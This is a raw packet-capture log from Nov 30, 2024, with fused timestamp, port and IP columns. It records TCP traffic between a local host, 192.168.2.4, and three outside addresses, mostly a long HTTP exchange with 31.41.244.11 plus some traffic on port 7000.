                                                      Nov 30, 2024 18:08:14.451801062 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.451843977 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.451960087 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.452006102 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.457179070 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.457242966 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.457309008 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.457354069 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:16.618288040 CET4976980192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:16.618565083 CET4978480192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:16.742985964 CET8049784185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:16.743019104 CET8049769185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:16.743118048 CET4976980192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:16.743302107 CET4978480192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:16.743302107 CET4978480192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:16.823055983 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:08:16.865675926 CET8049784185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:16.943049908 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:08:16.943185091 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:08:17.182676077 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:08:17.302663088 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:08:20.742546082 CET4978480192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:24.164103031 CET700049785179.43.171.209192.168.2.4
                                                      Nov 30, 2024 18:08:24.211148977 CET497857000192.168.2.4179.43.171.209
                                                      Nov 30, 2024 18:08:25.761442900 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:25.761698008 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:25.881584883 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:25.881675005 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:25.881712914 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:25.881763935 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:25.881870985 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:26.001849890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.266585112 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.266836882 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.266845942 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.266910076 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.266946077 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.267103910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.267115116 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.267143965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.267158031 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.267925024 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.267935991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.267940044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.267981052 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.268619061 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.268627882 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.268671036 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.387670994 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.387958050 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.388037920 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.391027927 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.391081095 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.391207933 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.391252041 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.400152922 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.402735949 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.467345953 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.467514992 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.467583895 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.471539974 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.471693993 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.471759081 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.471805096 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.479928970 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.480098009 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.480160952 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.488344908 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.488502979 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.488563061 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.496720076 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.496927023 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.496974945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.505188942 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.505249023 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.505322933 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.505369902 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.513598919 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.513670921 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.513747931 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.513797998 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.522017956 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.522069931 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.522236109 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.522290945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.530414104 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.530576944 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.530659914 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.537722111 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.537909985 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.537975073 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.544995070 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.545171976 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.545238018 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.552258015 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.552308083 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.552437067 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.552483082 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.668595076 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.668653965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.668786049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.668834925 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.671354055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.671418905 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.671577930 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.671626091 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.676616907 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.676701069 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.676830053 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.676878929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.681987047 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.682075024 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.682153940 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.682194948 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.687287092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.687349081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.687486887 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.687539101 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.692799091 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.692850113 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.692986965 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.693028927 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.697949886 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.698008060 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.698177099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.698216915 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.703319073 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.703497887 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.703516006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.703563929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.708633900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.708707094 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.708928108 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.708976984 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.714037895 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.714097023 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.714204073 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.714247942 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.719383001 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.719439030 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.719587088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.719631910 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.724709988 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.724769115 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.724873066 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.724920988 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.730134010 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.730184078 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.730443954 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.730489016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.735361099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.735400915 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.735558987 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.735605955 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.740698099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.740744114 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.740868092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.740911007 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.746022940 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.746090889 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.746212959 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.746262074 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.751399040 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.751463890 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.751559019 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.751609087 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.756704092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.756764889 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.756892920 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.756937981 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.762073040 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.762161016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.762284994 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.762331963 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.767371893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.767433882 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.767580032 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.767635107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.772712946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.772784948 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.772919893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.772965908 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.778079987 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.778136969 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.778299093 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.778347015 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.783559084 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.783629894 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.783665895 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.783709049 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.788722038 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.788773060 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.789020061 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.789064884 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.869848967 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.869981050 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.870019913 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.870039940 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.872363091 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.872415066 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.872534037 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.872580051 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.876153946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.876198053 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.876375914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.876420975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.881217957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.881263018 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.881385088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.881429911 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.886261940 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.886315107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.886442900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.886488914 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.890319109 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.890394926 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.890523911 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.890563965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.894471884 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.894519091 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.894720078 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.894762993 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.898848057 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.898890018 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.899070024 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.899116039 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.902719975 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.902786016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.903000116 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.903045893 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.906769991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.906816959 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.906951904 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.906996965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.911480904 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.911528111 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.911624908 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.911670923 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.914964914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.915009975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.915123940 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.915169954 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.919040918 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.919089079 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.919243097 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.919291019 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.922547102 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.922605038 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.922753096 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.922795057 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.925990105 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.926065922 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.926198006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.926243067 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.929425955 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.929475069 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.929636955 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.929682016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.932868004 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.932928085 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.933317900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.933366060 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.936345100 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.936423063 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.936523914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.936566114 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.939759016 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.939815044 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.939985991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.940026045 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.943367958 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.943425894 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.943609953 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.943655014 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.946727991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.946815968 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.946945906 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.946991920 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.950310946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.950371027 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.950530052 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.950579882 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.953557968 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.953617096 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.953762054 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.953819990 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.956991911 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.957058907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.957218885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.957263947 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.960438013 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.960499048 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.960652113 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.960699081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.963968992 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.964036942 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.964131117 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.964176893 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.967363119 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.967434883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.967560053 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.967643976 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.970813036 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.970875025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.970980883 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.971023083 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.974248886 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.974318981 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.974442959 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.974529982 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.977691889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.977771044 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.977915049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.977962971 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.981142044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.981198072 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.981340885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.981383085 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.984596968 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.984647036 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.984800100 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.984842062 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.988030910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.988106966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.988266945 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.988307953 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.991537094 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.991596937 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.991727114 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.991767883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.994966984 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.995038033 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:27.995131016 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:27.995186090 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.000639915 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.000715017 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.000896931 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.000937939 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.003660917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.003712893 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.003839016 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.003880024 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.006150961 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.006203890 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.006323099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.006362915 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.009242058 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.009293079 CET4980580192.168.2.431.41.244.11
